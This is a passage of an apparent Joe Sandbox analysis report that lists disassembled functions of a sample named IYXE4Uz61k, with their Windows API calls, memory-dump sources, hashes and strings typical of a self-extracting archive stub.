                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                                    • API String ID: 176396367-3743748572
                                                                                                                                                                                                    • Opcode ID: f5158780ce21165d21a0ef790f4d29cedde3dd06fee286fe9ae4ef3da36a56e3
                                                                                                                                                                                                    • Instruction ID: e1139848fd8bc72f492c90e413f049408cd789946000325f9a954fb97555e3e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5158780ce21165d21a0ef790f4d29cedde3dd06fee286fe9ae4ef3da36a56e3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31403264435596EE34BB549C42B7AB3A4FB90720F58441FF4D6D7280FB94AD5183A2
                                                                                                                                                                                                    Function 0089C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0089C868: _free.LIBCMT ref: 0089C891
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C8F2
                                                                                                                                                                                                      • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
                                                                                                                                                                                                      • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C8FD
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C908
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C95C
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C967
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C972
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C97D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                                    • Instruction ID: 6972b2502b68fdd3ae6e2d9f1c43de04e167bdf70f4ee059beb470eddaa8fdd3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48110D71580B05EBED20B7B5CD07FCB7BACFF05B04F484C25B2ADE6092DA66A5068752
                                                                                                                                                                                                    Function 0088E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0088E669,0088E5CC,0088E86D), ref: 0088E605
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0088E61B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0088E630
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                                                                                                    • Opcode ID: 667f669f3a3d60f743164dbf9a2c30c8a39f831aa7230ba5a6dbeeeaa3f45411
                                                                                                                                                                                                    • Instruction ID: bbda850a8f2d3d022db00abf64ff309836f0f7e2d5d08c3c77c277292d37c195
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 667f669f3a3d60f743164dbf9a2c30c8a39f831aa7230ba5a6dbeeeaa3f45411
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F0F031B91A22AB6F31EFF45C88A6663C8FF36745304063AE902D3610FB24CC94DB90
                                                                                                                                                                                                    Function 0088146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008814C2
                                                                                                                                                                                                      • Part of subcall function 0087B146: GetVersionExW.KERNEL32(?), ref: 0087B16B
                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008814E6
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00881500
                                                                                                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00881513
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00881523
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00881533
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2092733347-0
                                                                                                                                                                                                    • Opcode ID: 392c4beb25e8e1a75e9ebfb7a1189cf54cad9a36d89b3ca83dac927c4c00bcfc
                                                                                                                                                                                                    • Instruction ID: d2dbc735a81e08b20e13fd3cb37f2e1f6edda4757ca6231b4c8720b84a1ef318
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 392c4beb25e8e1a75e9ebfb7a1189cf54cad9a36d89b3ca83dac927c4c00bcfc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C31F875108305ABC700DFA8C88499BB7F8FF99714F004A1EF999C3610E734D509CBA6
                                                                                                                                                                                                    Function 00892AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00892AF1,008902FC,0088FA34), ref: 00892B08
                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00892B16
                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00892B2F
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00892AF1,008902FC,0088FA34), ref: 00892B81
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                    • Opcode ID: fbe96abd3bb8ccb5c1c7ae579ea3ac2cc19ccd4b2dd8166e69a6e1e9983bc4ed
                                                                                                                                                                                                    • Instruction ID: 488f71f49338013e34228ee23fb631db78bde2fb442217a6a3463b42e0f6209a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbe96abd3bb8ccb5c1c7ae579ea3ac2cc19ccd4b2dd8166e69a6e1e9983bc4ed
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9201A23221A712BEBE243B787C95A2A2BD9FF537B4B680B3AF510D58E0EF115D009645
                                                                                                                                                                                                    Function 008997E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,008B1098,00894674,008B1098,?,?,008940EF,?,?,008B1098), ref: 008997E9
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089981C
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899844
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,008B1098), ref: 00899851
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,008B1098), ref: 0089985D
                                                                                                                                                                                                    • _abort.LIBCMT ref: 00899863
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                    • Opcode ID: 996dfa444da55b09e0d35fb6efb2b9e0a0714c315faea888b741df244baf1d0c
                                                                                                                                                                                                    • Instruction ID: 3dac859f187f0ac8ea031646a0f79ec13e682698a74a6a17d49cc1db17c900cd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 996dfa444da55b09e0d35fb6efb2b9e0a0714c315faea888b741df244baf1d0c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68F0A435140A0266DE12332C7C0AA1B2A69FFD3771F2C013CF555E2692FE2588018567
                                                                                                                                                                                                    Function 0087C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 008805DA: _wcslen.LIBCMT ref: 008805E0
                                                                                                                                                                                                      • Part of subcall function 0087B92D: _wcsrchr.LIBVCRUNTIME ref: 0087B944
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0087C197
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0087C1DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                                                                                                    • Opcode ID: 9350be1749e9bcb0f2b86f974efb422370eeb9d6b2b2ef99fda86103e922423c
                                                                                                                                                                                                    • Instruction ID: 7c8c6d3af09fbaa14f279f94c0a1ea18340cad1e17839d89d68f68f594b69337
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9350be1749e9bcb0f2b86f974efb422370eeb9d6b2b2ef99fda86103e922423c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13416A2254071595D732BF788802A7BB3A8FF42704F14851EF99AEB186EB50CDC2C3A2
                                                                                                                                                                                                    Function 0088CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0088CE9D
                                                                                                                                                                                                      • Part of subcall function 0087B690: _wcslen.LIBCMT ref: 0087B696
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088CED1
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,008B946A), ref: 0088CEF1
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0088CFFE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: %s%s%u
                                                                                                                                                                                                    • API String ID: 110358324-1360425832
                                                                                                                                                                                                    • Opcode ID: 7279762a518420310cea74244a29fdd7594c28ee983f87dab5b5ae57fa65daf9
                                                                                                                                                                                                    • Instruction ID: 1728481fa9723abb0c98f2ae7c373cc0cb4bdd8f8933cf72501187684da36c43
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7279762a518420310cea74244a29fdd7594c28ee983f87dab5b5ae57fa65daf9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F415071900659AADF25EBA4CC45AEA77BCFB05340F4080A6FA09E7181EF749A44CF76
                                                                                                                                                                                                    Function 0087BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0087BB27
                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0087A275,?,?,00000800,?,0087A23A,?,0087755C), ref: 0087BBC5
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0087BC3B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                                                                                                    • String ID: UNC$\\?\
                                                                                                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                                                                                                    • Opcode ID: eddb1a4662462e863a16e8c961b8abf7a8baa1ae739edba07c2a8eab35da31cf
                                                                                                                                                                                                    • Instruction ID: 658f098d175ac5617b5c25b1e17d2233ad5d9f99d9220587a15d69f78d2b6dc7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eddb1a4662462e863a16e8c961b8abf7a8baa1ae739edba07c2a8eab35da31cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C441B131400219AADF22AF64CC41FEB77AAFF92394F14C425F818E7159EB74DA948B61
                                                                                                                                                                                                    Function 0088B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0088B6ED
                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0088B712
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0088B744
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0088B767
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0088B73D,00000066), ref: 0088A6D5
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A6EC
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: LoadResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A703
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: LockResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A712
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0088B73D,00000066), ref: 0088A72D
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GlobalLock.KERNEL32(00000000), ref: 0088A73E
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0088A762
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0088A7A7
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0088A7C6
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GlobalFree.KERNEL32(00000000), ref: 0088A7CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                                                    • String ID: ]
                                                                                                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                                                                                                    • Opcode ID: 4d7ccbd83776f8e257d0c632fb1760e3d30ecb0b4756b332175be39408c077cd
                                                                                                                                                                                                    • Instruction ID: a327e273502ccf7357204e2318e2f21fa2e9747d4a1b74444cbf14fce4d8522c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d7ccbd83776f8e257d0c632fb1760e3d30ecb0b4756b332175be39408c077cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6701AD3654060567E71277B89C49A6F7BB9FBC0B62F180122B900E7295EB21CD0947A2
                                                                                                                                                                                                    Function 0088D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                      • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0088D64B
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0088D661
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0088D675
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0088D684
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                                                                    • String ID: RENAMEDLG
                                                                                                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                                                                                                    • Opcode ID: f90cfef47adc16805de4a5f2834143e50360a04372f2337d45cd0f3b828489ee
                                                                                                                                                                                                    • Instruction ID: f170fc7e8b5e45e1a6b831453f06b7008e4896f5b6fc638c524f5b7587354885
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f90cfef47adc16805de4a5f2834143e50360a04372f2337d45cd0f3b828489ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04012833385718BAE220AF689D09F5B776EFB6AB01F014111F705E20D1D7A69A048BB6
                                                                                                                                                                                                    Function 00897E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
